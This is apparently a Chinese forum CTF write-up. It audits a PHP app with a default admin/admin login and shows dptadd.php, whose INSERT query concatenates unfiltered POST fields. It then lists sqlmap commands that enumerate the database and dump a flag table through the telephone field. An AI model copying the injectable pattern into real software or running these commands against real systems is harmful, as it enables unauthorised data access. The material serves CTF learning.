首先审计找入口点,admin目录下都可访问但是没有功能点所以没什么用还有一个入口点在login.php,默认口令admin/admin然后登录到dpt.php,新增功能的地方会跳转dptadd.php执行sql语句,可以看到dptadd.php中没有对输入参数过滤所以可以尝试进行sql注入[PHP] 纯文本查看 复制代码 <?php
session_start();
require 'conn.php';
if(!isset($_SESSION['login'])){
header("location:login.php");
return;
}else{
//注入点
$_POST['dpt_name']=!empty($_POST['dpt_name'])?$_POST['dpt_name']:NULL;
$_POST['dpt_address']=!empty($_POST['dpt_address'])?$_POST['dpt_address']:NULL;
$_POST['dpt_build_year']=!empty($_POST['dpt_build_year'])?$_POST['dpt_build_year']:NULL;
$_POST['dpt_has_cert']=!empty($_POST['dpt_has_cert'])?$_POST['dpt_has_cert']:NULL;
$_POST['dpt_cert_number']=!empty($_POST['dpt_cert_number'])?$_POST['dpt_cert_number']:NULL;
$_POST['dpt_telephone_number']=!empty($_POST['dpt_telephone_number'])?$_POST['dpt_telephone_number']:NULL;
$dpt_name=$_POST['dpt_name'];
$dpt_address=$_POST['dpt_address'];
$dpt_build_year=$_POST['dpt_build_year'];
$dpt_has_cert=$_POST['dpt_has_cert']=="on"?"1":"0";
$dpt_cert_number=$_POST['dpt_cert_number'];
$dpt_telephone_number=$_POST['dpt_telephone_number'];
$mysqli->query("set names utf-8");
$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
$result=$mysqli->query($sql);
echo $sql;
if($result===true){
$mysqli->close();
header("location:dpt.php");
}else{
die(mysqli_error($mysqli));
}
}
?>
payloadsqlmap版本[PHP] 纯文本查看 复制代码 python .\sqlmap.py -r ".\post.txt" -p dpt_telephone_number --dbs
python .\sqlmap.py -r ".\post.txt" -p dpt_telephone_number -D sds --tables
python .\sqlmap.py -r ".\post.txt" -p dpt_telephone_number -D sds -T sds_fl9g --columns
python .\sqlmap.py -r ".\post.txt" -p dpt_telephone_number -D sds -T sds_fl9g -c "flag" --dump
python .\sqlmap.py -r ".\post.txt" -p dpt_telephone_number -D sds -T sds_fl9g -C "Column,Type" --dump | 
发表于 2021-9-2 13:21
|
发表于 2021-9-2 20:37
